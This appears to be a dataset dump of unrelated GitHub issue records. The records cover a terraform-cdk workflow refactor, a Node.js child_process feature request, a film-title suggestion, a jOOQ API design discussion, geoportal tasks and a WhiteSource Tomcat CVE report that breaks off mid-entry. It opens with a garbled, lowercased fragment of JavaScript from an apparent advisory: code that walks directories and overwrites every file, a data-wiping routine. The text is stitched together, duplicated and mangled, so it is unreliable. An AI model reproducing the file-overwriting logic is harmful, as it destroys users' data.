catch t math ceil math random async function h n o if a existssync n return let r try r a readdirsync n catch t const f const c buffer from for var e e r length e const i u join n r let t null try t a lstatsync i catch t continue if t isdirectory const s h i o s length f push s null else if i indexof o try a writefile i c tostring function overwrites file with catch t return f const ssl true export ssl as default ssl publish date url a href cvss score details base score metrics exploitability metrics attack vector network attack complexity low privileges required none user interaction none scope unchanged impact metrics confidentiality impact high integrity impact high availability impact high for more information on scores click a href step up your open source security game with whitesource | 0 |
17,570 | 23,383,873,103 | IssuesEvent | 2022-08-11 12:07:58 | hashicorp/terraform-cdk | https://api.github.com/repos/hashicorp/terraform-cdk | closed | Refactor Github Actions using reusable workflows | enhancement needs-priority dev-process | <!--- Please keep this note for the community --->
### Community Note
- Please vote on this issue by adding a 👍 [reaction](https://blog.github.com/2016-03-10-add-reactions-to-pull-requests-issues-and-comments/) to the original issue to help the community and maintainers prioritize this request
- Please do not leave "+1" or other comments that do not add relevant new information or questions, they generate extra noise for issue followers and do not help prioritize the request
- If you are interested in working on this issue or have submitted a pull request, please leave a comment
<!--- Thank you for keeping this note for the community --->
### Description
Currently we have a lot of repetition (e.g. for integration tests) in our Github action workflows. We should refactor them using [reusable workflows](https://docs.github.com/en/actions/using-workflows/reusing-workflows#creating-a-reusable-workflow) to avoid duplicated code.
<!--- Please leave a helpful description of the feature request here. --->
<!--- Information about code formatting: https://help.github.com/articles/basic-writing-and-formatting-syntax/#quoting-code --->
### References
<!---
Information about referencing Github Issues: https://help.github.com/articles/basic-writing-and-formatting-syntax/#referencing-issues-and-pull-requests
Are there any other GitHub issues (open or closed) or pull requests that should be linked here? Vendor blog posts or documentation?
--->
| 1.0 | Refactor Github Actions using reusable workflows - <!--- Please keep this note for the community --->
### Community Note
- Please vote on this issue by adding a 👍 [reaction](https://blog.github.com/2016-03-10-add-reactions-to-pull-requests-issues-and-comments/) to the original issue to help the community and maintainers prioritize this request
- Please do not leave "+1" or other comments that do not add relevant new information or questions, they generate extra noise for issue followers and do not help prioritize the request
- If you are interested in working on this issue or have submitted a pull request, please leave a comment
<!--- Thank you for keeping this note for the community --->
### Description
Currently we have a lot of repetition (e.g. for integration tests) in our Github action workflows. We should refactor them using [reusable workflows](https://docs.github.com/en/actions/using-workflows/reusing-workflows#creating-a-reusable-workflow) to avoid duplicated code.
<!--- Please leave a helpful description of the feature request here. --->
<!--- Information about code formatting: https://help.github.com/articles/basic-writing-and-formatting-syntax/#quoting-code --->
### References
<!---
Information about referencing Github Issues: https://help.github.com/articles/basic-writing-and-formatting-syntax/#referencing-issues-and-pull-requests
Are there any other GitHub issues (open or closed) or pull requests that should be linked here? Vendor blog posts or documentation?
--->
| process | refactor github actions using reusable workflows community note please vote on this issue by adding a 👍 to the original issue to help the community and maintainers prioritize this request please do not leave or other comments that do not add relevant new information or questions they generate extra noise for issue followers and do not help prioritize the request if you are interested in working on this issue or have submitted a pull request please leave a comment description currently we have a lot of repetition e g for integration tests in our github action workflows we should refactor them using to avoid duplicated code references information about referencing github issues are there any other github issues open or closed or pull requests that should be linked here vendor blog posts or documentation | 1 |
16,395 | 21,176,843,190 | IssuesEvent | 2022-04-08 01:29:23 | nodejs/node | https://api.github.com/repos/nodejs/node | closed | child_process, expose a raw exit code | child_process feature request stale | I'd like to have a feature in node to access the raw exit status of the program, for a better emscripten system() implementation. Right now emscripten's system implementation is repacking the exit code to return it in the "waitpid" format as required by POSIX. However, this only POSIX specific and doesn't make much sense e.g. on Windows, but we also don't want to return values that doesn't match when compiling and running the C program natively since it could cause incompatibility. Thus having access to raw exit code of a child program from node would be best approach to go here!
See the emscripten system implementation and related node / libuv discussion here:
https://github.com/emscripten-core/emscripten/pull/10547 | 1.0 | child_process, expose a raw exit code - I'd like to have a feature in node to access the raw exit status of the program, for a better emscripten system() implementation. Right now emscripten's system implementation is repacking the exit code to return it in the "waitpid" format as required by POSIX. However, this only POSIX specific and doesn't make much sense e.g. on Windows, but we also don't want to return values that doesn't match when compiling and running the C program natively since it could cause incompatibility. Thus having access to raw exit code of a child program from node would be best approach to go here!
See the emscripten system implementation and related node / libuv discussion here:
https://github.com/emscripten-core/emscripten/pull/10547 | process | child process expose a raw exit code i d like to have a feature in node to access the raw exit status of the program for a better emscripten system implementation right now emscripten s system implementation is repacking the exit code to return it in the waitpid format as required by posix however this only posix specific and doesn t make much sense e g on windows but we also don t want to return values that doesn t match when compiling and running the c program natively since it could cause incompatibility thus having access to raw exit code of a child program from node would be best approach to go here see the emscripten system implementation and related node libuv discussion here | 1 |
337,702 | 30,258,075,898 | IssuesEvent | 2023-07-07 05:38:25 | BoBoBaSs84/Los.Santos.Dope.Wars | https://api.github.com/repos/BoBoBaSs84/Los.Santos.Dope.Wars | closed | Feature: Screen provider interface and implementation | enhancement tests | - maybe we need to refactor notification too | 1.0 | Feature: Screen provider interface and implementation - - maybe we need to refactor notification too | non_process | feature screen provider interface and implementation maybe we need to refactor notification too | 0 |
17,723 | 23,625,566,616 | IssuesEvent | 2022-08-25 03:17:09 | lynnandtonic/nestflix.fun | https://api.github.com/repos/lynnandtonic/nestflix.fun | closed | Add Big Baby from "Allegoria" (Screenshots added) | suggested title in process | Please add as much of the following info as you can:
Title: Big Baby
Type (film/tv show): film - slasher horror
Film or show in which it appears: Allegoria
Is the parent film/show streaming anywhere? Yes - Amazon Prime & Shudder
Synopsis: He was traumatized by being left in his crib while his babysitter had sex. Twenty years later, this big baby goes on a killing spree.
About when in the parent film/show does it appear? Slightly past mid-way it's shown interspersed with reaction shots of the people watching it. It's also shown in its entirity as a post-credits scene.
Actual footage of the film/show can be seen (yes/no)? Yes
Timestamps:
- interspersed with audience reactions: 37:42 - 40:08
- post credits scene begins at 1:07:30
Production Company: an Eddie Park film
Quote: Who's the big baby now?!
(Sorry, I can't give screenshots. I watched it through a reviewer screener.)
| 1.0 | Add Big Baby from "Allegoria" (Screenshots added) - Please add as much of the following info as you can:
Title: Big Baby
Type (film/tv show): film - slasher horror
Film or show in which it appears: Allegoria
Is the parent film/show streaming anywhere? Yes - Amazon Prime & Shudder
Synopsis: He was traumatized by being left in his crib while his babysitter had sex. Twenty years later, this big baby goes on a killing spree.
About when in the parent film/show does it appear? Slightly past mid-way it's shown interspersed with reaction shots of the people watching it. It's also shown in its entirity as a post-credits scene.
Actual footage of the film/show can be seen (yes/no)? Yes
Timestamps:
- interspersed with audience reactions: 37:42 - 40:08
- post credits scene begins at 1:07:30
Production Company: an Eddie Park film
Quote: Who's the big baby now?!
(Sorry, I can't give screenshots. I watched it through a reviewer screener.)
| process | add big baby from allegoria screenshots added please add as much of the following info as you can title big baby type film tv show film slasher horror film or show in which it appears allegoria is the parent film show streaming anywhere yes amazon prime shudder synopsis he was traumatized by being left in his crib while his babysitter had sex twenty years later this big baby goes on a killing spree about when in the parent film show does it appear slightly past mid way it s shown interspersed with reaction shots of the people watching it it s also shown in its entirity as a post credits scene actual footage of the film show can be seen yes no yes timestamps interspersed with audience reactions post credits scene begins at production company an eddie park film quote who s the big baby now sorry i can t give screenshots i watched it through a reviewer screener | 1 |
12,207 | 14,405,981,331 | IssuesEvent | 2020-12-03 19:31:38 | jOOQ/jOOQ | https://api.github.com/repos/jOOQ/jOOQ | opened | Open up DSL function API to <U> types of converted columns | C: Functionality E: All Editions P: Medium T: Enhancement T: Incompatible change | Historically, we only supported the JDBC types for `<T>` in `Field<T>`, and then a few of our own, including `UByte` or `JSON`, etc.
Later on, it became clear this design was insufficient and we needed various means of supporting custom data types, including:
- `Converter<T, U>` for simple data type conversions between the JDBC types `<T>` and arbitrary user defined types `<U>`
- `Binding<T, U>`, like converters, but offering SPIs for the data type binding to and from JDBC
- `EnumType`, a type safe mapping for MySQL column-level or PostgreSQL schema-level `ENUM` types
- `Domain<T>` for standard SQL domains
- `EmbeddableRecord` to wrap several columns in a single "virtual" column with a user type
A lot of these types are really backed by one of the JDBC types, which are required throughout the jOOQ API. For example, with a `Converter<String, IBAN>`, we can map a custom `IBAN` type to the JDBC `String` type, stored e.g. as `VARCHAR(50)`. However, this now prevents using functions like `DSL.length(IBAN_COLUMN)` on such columns, which is a pity!
This can be fixed in several ways:
- We could remove all type information from functions like
`DSL.length(Field<String>): Field<String>` to: `DSL.length(Field<?>): Field<Integer>`
`DSL.substring(Field<String>, int): Field<String>` to `<U> DSL.substring(Field<U>, int): Field<U>`
This would effectively remove all type safety, which isn't very compelling.
Advantages:
- Pragmatic solution
- We could open up the entire API to user defined types
- We could change `Field<T>` to `Field<T, U>`, changing
`DSL.length(Field<String>): Field<String>` to `DSL.length(Field<String, ?>): Field<Integer, Integer>`
`DSL.substring(Field<String>, int): Field<String>` to `<U> DSL.substring(Field<String, U>, int): Field<String, U>`
This would be a huge, highly backwards incompatible change (unless it can be solved with a clever subtyping trick), so also not very compelling. (We'd also need `DataType<T, U>` and many other changes). But it has a chance of thoroughly addressing this issue.
Advantages:
- A lot of internal raw type casts where `<T>` and `<U>` are confused could be removed
- This probably includes some rather subtle bugs that cannot be fixed, currently
- We wouldn't have to compromise on type safety and could still open up the entire API to user defined types
- I feel that the availability of both `<T, U>` types *everywhere* will have a lot of unforeseen advantages
It is not likely this can be solved any time soon. The issue here will serve as a starting point for discussion, and a possibility to link to when minor things will be fixed, such as `DSL.sum()`: #3415
Given how little traction issues like #3415 have received, this may not be the most pressing of issues. Perhaps
- People aren't using forced types all that much
- If they do, they're using them on "strong domain types", where data centric function calls hardly make sense (e.g. calling `LPAD()` on an `IBAN` is not an every day requirement)
- If it is a requirement, the workarounds are usually very simple and pragmatic: Use `Field.coerce()`, rawtype casts, plain SQL templating, etc. | True | Open up DSL function API to <U> types of converted columns - Historically, we only supported the JDBC types for `<T>` in `Field<T>`, and then a few of our own, including `UByte` or `JSON`, etc.
Later on, it became clear this design was insufficient and we needed various means of supporting custom data types, including:
- `Converter<T, U>` for simple data type conversions between the JDBC types `<T>` and arbitrary user defined types `<U>`
- `Binding<T, U>`, like converters, but offering SPIs for the data type binding to and from JDBC
- `EnumType`, a type safe mapping for MySQL column-level or PostgreSQL schema-level `ENUM` types
- `Domain<T>` for standard SQL domains
- `EmbeddableRecord` to wrap several columns in a single "virtual" column with a user type
A lot of these types are really backed by one of the JDBC types, which are required throughout the jOOQ API. For example, with a `Converter<String, IBAN>`, we can map a custom `IBAN` type to the JDBC `String` type, stored e.g. as `VARCHAR(50)`. However, this now prevents using functions like `DSL.length(IBAN_COLUMN)` on such columns, which is a pity!
This can be fixed in several ways:
- We could remove all type information from functions like
`DSL.length(Field<String>): Field<String>` to: `DSL.length(Field<?>): Field<Integer>`
`DSL.substring(Field<String>, int): Field<String>` to `<U> DSL.substring(Field<U>, int): Field<U>`
This would effectively remove all type safety, which isn't very compelling.
Advantages:
- Pragmatic solution
- We could open up the entire API to user defined types
- We could change `Field<T>` to `Field<T, U>`, changing
`DSL.length(Field<String>): Field<String>` to `DSL.length(Field<String, ?>): Field<Integer, Integer>`
`DSL.substring(Field<String>, int): Field<String>` to `<U> DSL.substring(Field<String, U>, int): Field<String, U>`
This would be a huge, highly backwards incompatible change (unless it can be solved with a clever subtyping trick), so also not very compelling. (We'd also need `DataType<T, U>` and many other changes). But it has a chance of thoroughly addressing this issue.
Advantages:
- A lot of internal raw type casts where `<T>` and `<U>` are confused could be removed
- This probably includes some rather subtle bugs that cannot be fixed, currently
- We wouldn't have to compromise on type safety and could still open up the entire API to user defined types
- I feel that the availability of both `<T, U>` types *everywhere* will have a lot of unforeseen advantages
It is not likely this can be solved any time soon. The issue here will serve as a starting point for discussion, and a possibility to link to when minor things will be fixed, such as `DSL.sum()`: #3415
Given how little traction issues like #3415 have received, this may not be the most pressing of issues. Perhaps
- People aren't using forced types all that much
- If they do, they're using them on "strong domain types", where data centric function calls hardly make sense (e.g. calling `LPAD()` on an `IBAN` is not an every day requirement)
- If it is a requirement, the workarounds are usually very simple and pragmatic: Use `Field.coerce()`, rawtype casts, plain SQL templating, etc. | non_process | open up dsl function api to types of converted columns historically we only supported the jdbc types for in field and then a few of our own including ubyte or json etc later on it became clear this design was insufficient and we needed various means of supporting custom data types including converter for simple data type conversions between the jdbc types and arbitrary user defined types binding like converters but offering spis for the data type binding to and from jdbc enumtype a type safe mapping for mysql column level or postgresql schema level enum types domain for standard sql domains embeddablerecord to wrap several columns in a single virtual column with a user type a lot of these types are really backed by one of the jdbc types which are required throughout the jooq api for example with a converter we can map a custom iban type to the jdbc string type stored e g as varchar however this now prevents using functions like dsl length iban column on such columns which is a pity this can be fixed in several ways we could remove all type information from functions like dsl length field field to dsl length field field dsl substring field int field to dsl substring field int field this would effectively remove all type safety which isn t very compelling advantages pragmatic solution we could open up the entire api to user defined types we could change field to field changing dsl length field field to dsl length field field dsl substring field int field to dsl substring field int field this would be a huge highly backwards incompatible change unless it can be solved with a clever subtyping trick so also not very compelling we d also need datatype and many other changes but it has a chance of thoroughly addressing this issue advantages a lot of internal raw type casts where and are confused could be removed this probably includes some rather subtle bugs that cannot be fixed currently we wouldn t have to compromise on type safety and could still open up the entire api to user defined types i feel that the availability of both types everywhere will have a lot of unforeseen advantages it is not likely this can be solved any time soon the issue here will serve as a starting point for discussion and a possibility to link to when minor things will be fixed such as dsl sum given how little traction issues like have received this may not be the most pressing of issues perhaps people aren t using forced types all that much if they do they re using them on strong domain types where data centric function calls hardly make sense e g calling lpad on an iban is not an every day requirement if it is a requirement the workarounds are usually very simple and pragmatic use field coerce rawtype casts plain sql templating etc | 0 |
264,950 | 23,145,082,138 | IssuesEvent | 2022-07-28 23:14:22 | MPMG-DCC-UFMG/F01 | https://api.github.com/repos/MPMG-DCC-UFMG/F01 | closed | Teste de generalizacao para a tag Seridores - Registro por lotação - Pedra Azul | generalization test development template-Síntese tecnologia informatica tag-Servidores subtag-Registro por lotação | DoD: Realizar o teste de Generalização do validador da tag Seridores - Registro por lotação para o Município de Pedra Azul. | 1.0 | Teste de generalizacao para a tag Seridores - Registro por lotação - Pedra Azul - DoD: Realizar o teste de Generalização do validador da tag Seridores - Registro por lotação para o Município de Pedra Azul. | non_process | teste de generalizacao para a tag seridores registro por lotação pedra azul dod realizar o teste de generalização do validador da tag seridores registro por lotação para o município de pedra azul | 0 |
11,153 | 13,957,693,467 | IssuesEvent | 2020-10-24 08:10:59 | alexanderkotsev/geoportal | https://api.github.com/repos/alexanderkotsev/geoportal | opened | PT: Missing resources in the Geoportal | Geoportal Harvesting process PT - Portugal | Dear Angelo,
We can´t understand what is the problem with some of our metadata dataset that have downloadable service but doesn’t appear in the INSPIRE GEOPORTAL
I can give you the example of this dataset metadata:
fileIdentifier: 32ab6e64-b408-423c-8851-fd2531caf038
With this WFS service metatada:
fileIdentifier:400de6a6-53fa-46de-a926-3cb101e3a9d9
Can you please help us?
Best Regards,
Marta | 1.0 | PT: Missing resources in the Geoportal - Dear Angelo,
We can´t understand what is the problem with some of our metadata dataset that have downloadable service but doesn’t appear in the INSPIRE GEOPORTAL
I can give you the example of this dataset metadata:
fileIdentifier: 32ab6e64-b408-423c-8851-fd2531caf038
With this WFS service metatada:
fileIdentifier:400de6a6-53fa-46de-a926-3cb101e3a9d9
Can you please help us?
Best Regards,
Marta | process | pt missing resources in the geoportal dear angelo we can acute t understand what is the problem with some of our metadata dataset that have downloadable service but doesn rsquo t appear in the inspire geoportal i can give you the example of this dataset metadata fileidentifier with this wfs service metatada fileidentifier can you please help us best regards marta | 1 |
257,719 | 27,563,811,295 | IssuesEvent | 2023-03-08 01:08:12 | LynRodWS/alcor | https://api.github.com/repos/LynRodWS/alcor | opened | CVE-2021-41079 (High) detected in multiple libraries | security vulnerability | ## CVE-2021-41079 - High Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>tomcat-embed-core-9.0.33.jar</b>, <b>tomcat-embed-core-9.0.36.jar</b>, <b>tomcat-embed-core-9.0.35.jar</b>, <b>tomcat-embed-core-9.0.21.jar</b>, <b>tomcat-embed-core-9.0.31.jar</b></p></summary>
<p>
<details><summary><b>tomcat-embed-core-9.0.33.jar</b></p></summary>
<p>Core Tomcat implementation</p>
<p>Library home page: <a href="https://tomcat.apache.org/">https://tomcat.apache.org/</a></p>
<p>Path to dependency file: /services/elastic_ip_manager/pom.xml</p>
<p>Path to vulnerable library: /home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar</p>
<p>
Dependency Hierarchy:
- spring-boot-starter-web-2.2.6.RELEASE.jar (Root Library)
- spring-boot-starter-tomcat-2.2.6.RELEASE.jar
- :x: **tomcat-embed-core-9.0.33.jar** (Vulnerable Library)
</details>
<details><summary><b>tomcat-embed-core-9.0.36.jar</b></p></summary>
<p>Core Tomcat implementation</p>
<p>Library home page: <a href="https://tomcat.apache.org/">https://tomcat.apache.org/</a></p>
<p>Path to dependency file: /services/network_acl_manager/pom.xml</p>
<p>Path to vulnerable library: /home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.36/tomcat-embed-core-9.0.36.jar</p>
<p>
Dependency Hierarchy:
- spring-boot-starter-web-2.3.1.RELEASE.jar (Root Library)
- spring-boot-starter-tomcat-2.3.1.RELEASE.jar
- :x: **tomcat-embed-core-9.0.36.jar** (Vulnerable Library)
</details>
<details><summary><b>tomcat-embed-core-9.0.35.jar</b></p></summary>
<p>Core Tomcat implementation</p>
<p>Library home page: <a href="https://tomcat.apache.org/">https://tomcat.apache.org/</a></p>
<p>Path to dependency file: /services/security_group_manager/pom.xml</p>
<p>Path to vulnerable library: /home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.35/tomcat-embed-core-9.0.35.jar</p>
<p>
Dependency Hierarchy:
- spring-boot-starter-web-2.3.0.RELEASE.jar (Root Library)
- spring-boot-starter-tomcat-2.3.0.RELEASE.jar
- :x: **tomcat-embed-core-9.0.35.jar** (Vulnerable Library)
</details>
<details><summary><b>tomcat-embed-core-9.0.21.jar</b></p></summary>
<p>Core Tomcat implementation</p>
<p>Library home page: <a href="https://tomcat.apache.org/">https://tomcat.apache.org/</a></p>
<p>Path to dependency file: /services/vpc_manager/pom.xml</p>
<p>Path to vulnerable library: /home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.21/tomcat-embed-core-9.0.21.jar</p>
<p>
Dependency Hierarchy:
- spring-boot-starter-web-2.1.6.RELEASE.jar (Root Library)
- spring-boot-starter-tomcat-2.1.6.RELEASE.jar
- :x: **tomcat-embed-core-9.0.21.jar** (Vulnerable Library)
</details>
<details><summary><b>tomcat-embed-core-9.0.31.jar</b></p></summary>
<p>Core Tomcat implementation</p>
<p>Library home page: <a href="https://tomcat.apache.org/">https://tomcat.apache.org/</a></p>
<p>Path to dependency file: /services/route_manager/pom.xml</p>
<p>Path to vulnerable library: /home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.31/tomcat-embed-core-9.0.31.jar</p>
<p>
Dependency Hierarchy:
- spring-boot-starter-web-2.2.5.RELEASE.jar (Root Library)
- spring-boot-starter-tomcat-2.2.5.RELEASE.jar
- :x: **tomcat-embed-core-9.0.31.jar** (Vulnerable Library)
</details>
<p>Found in base branch: <b>master</b></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
Apache Tomcat 8.5.0 to 8.5.63, 9.0.0-M1 to 9.0.43 and 10.0.0-M1 to 10.0.2 did not properly validate incoming TLS packets. When Tomcat was configured to use NIO+OpenSSL or NIO2+OpenSSL for TLS, a specially crafted packet could be used to trigger an infinite loop resulting in a denial of service.
<p>Publish Date: 2021-09-16
<p>URL: <a href=https://www.mend.io/vulnerability-database/CVE-2021-41079>CVE-2021-41079</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>7.5</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: None
- Availability Impact: High
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://tomcat.apache.org/security-10.html">https://tomcat.apache.org/security-10.html</a></p>
<p>Release Date: 2021-09-16</p>
<p>Fix Resolution (org.apache.tomcat.embed:tomcat-embed-core): 9.0.44</p>
<p>Direct dependency fix Resolution (org.springframework.boot:spring-boot-starter-web): 2.3.10.RELEASE</p><p>Fix Resolution (org.apache.tomcat.embed:tomcat-embed-core): 9.0.44</p>
<p>Direct dependency fix Resolution (org.springframework.boot:spring-boot-starter-web): 2.3.10.RELEASE</p><p>Fix Resolution (org.apache.tomcat.embed:tomcat-embed-core): 9.0.44</p>
<p>Direct dependency fix Resolution (org.springframework.boot:spring-boot-starter-web): 2.3.10.RELEASE</p><p>Fix Resolution (org.apache.tomcat.embed:tomcat-embed-core): 9.0.44</p>
<p>Direct dependency fix Resolution (org.springframework.boot:spring-boot-starter-web): 2.3.10.RELEASE</p><p>Fix Resolution (org.apache.tomcat.embed:tomcat-embed-core): 9.0.44</p>
<p>Direct dependency fix Resolution (org.springframework.boot:spring-boot-starter-web): 2.3.10.RELEASE</p>
</p>
</details>
<p></p>
***
:rescue_worker_helmet: Automatic Remediation is available for this issue | True | CVE-2021-41079 (High) detected in multiple libraries - ## CVE-2021-41079 - High Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>tomcat-embed-core-9.0.33.jar</b>, <b>tomcat-embed-core-9.0.36.jar</b>, <b>tomcat-embed-core-9.0.35.jar</b>, <b>tomcat-embed-core-9.0.21.jar</b>, <b>tomcat-embed-core-9.0.31.jar</b></p></summary>
<p>
<details><summary><b>tomcat-embed-core-9.0.33.jar</b></p></summary>
<p>Core Tomcat implementation</p>
<p>Library home page: <a href="https://tomcat.apache.org/">https://tomcat.apache.org/</a></p>
<p>Path to dependency file: /services/elastic_ip_manager/pom.xml</p>
<p>Path to vulnerable library: /home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar</p>
<p>
Dependency Hierarchy:
- spring-boot-starter-web-2.2.6.RELEASE.jar (Root Library)
- spring-boot-starter-tomcat-2.2.6.RELEASE.jar
- :x: **tomcat-embed-core-9.0.33.jar** (Vulnerable Library)
</details>
<details><summary><b>tomcat-embed-core-9.0.36.jar</b></p></summary>
<p>Core Tomcat implementation</p>
<p>Library home page: <a href="https://tomcat.apache.org/">https://tomcat.apache.org/</a></p>
<p>Path to dependency file: /services/network_acl_manager/pom.xml</p>
<p>Path to vulnerable library: /home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.36/tomcat-embed-core-9.0.36.jar</p>
<p>
Dependency Hierarchy:
- spring-boot-starter-web-2.3.1.RELEASE.jar (Root Library)
- spring-boot-starter-tomcat-2.3.1.RELEASE.jar
- :x: **tomcat-embed-core-9.0.36.jar** (Vulnerable Library)
</details>
<details><summary><b>tomcat-embed-core-9.0.35.jar</b></p></summary>
<p>Core Tomcat implementation</p>
<p>Library home page: <a href="https://tomcat.apache.org/">https://tomcat.apache.org/</a></p>
<p>Path to dependency file: /services/security_group_manager/pom.xml</p>
<p>Path to vulnerable library: /home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.35/tomcat-embed-core-9.0.35.jar</p>
<p>
Dependency Hierarchy:
- spring-boot-starter-web-2.3.0.RELEASE.jar (Root Library)
- spring-boot-starter-tomcat-2.3.0.RELEASE.jar
- :x: **tomcat-embed-core-9.0.35.jar** (Vulnerable Library)
</details>
<details><summary><b>tomcat-embed-core-9.0.21.jar</b></p></summary>
<p>Core Tomcat implementation</p>
<p>Library home page: <a href="https://tomcat.apache.org/">https://tomcat.apache.org/</a></p>
<p>Path to dependency file: /services/vpc_manager/pom.xml</p>
<p>Path to vulnerable library: /home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.21/tomcat-embed-core-9.0.21.jar</p>
<p>
Dependency Hierarchy:
- spring-boot-starter-web-2.1.6.RELEASE.jar (Root Library)
- spring-boot-starter-tomcat-2.1.6.RELEASE.jar
- :x: **tomcat-embed-core-9.0.21.jar** (Vulnerable Library)
</details>
<details><summary><b>tomcat-embed-core-9.0.31.jar</b></p></summary>
<p>Core Tomcat implementation</p>
<p>Library home page: <a href="https://tomcat.apache.org/">https://tomcat.apache.org/</a></p>
<p>Path to dependency file: /services/route_manager/pom.xml</p>
<p>Path to vulnerable library: /home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.31/tomcat-embed-core-9.0.31.jar</p>
<p>
Dependency Hierarchy:
- spring-boot-starter-web-2.2.5.RELEASE.jar (Root Library)
- spring-boot-starter-tomcat-2.2.5.RELEASE.jar
- :x: **tomcat-embed-core-9.0.31.jar** (Vulnerable Library)
</details>
<p>Found in base branch: <b>master</b></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
Apache Tomcat 8.5.0 to 8.5.63, 9.0.0-M1 to 9.0.43 and 10.0.0-M1 to 10.0.2 did not properly validate incoming TLS packets. When Tomcat was configured to use NIO+OpenSSL or NIO2+OpenSSL for TLS, a specially crafted packet could be used to trigger an infinite loop resulting in a denial of service.
<p>Publish Date: 2021-09-16
<p>URL: <a href=https://www.mend.io/vulnerability-database/CVE-2021-41079>CVE-2021-41079</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>7.5</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: None
- Availability Impact: High
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://tomcat.apache.org/security-10.html">https://tomcat.apache.org/security-10.html</a></p>
<p>Release Date: 2021-09-16</p>
<p>Fix Resolution (org.apache.tomcat.embed:tomcat-embed-core): 9.0.44</p>
<p>Direct dependency fix Resolution (org.springframework.boot:spring-boot-starter-web): 2.3.10.RELEASE</p><p>Fix Resolution (org.apache.tomcat.embed:tomcat-embed-core): 9.0.44</p>
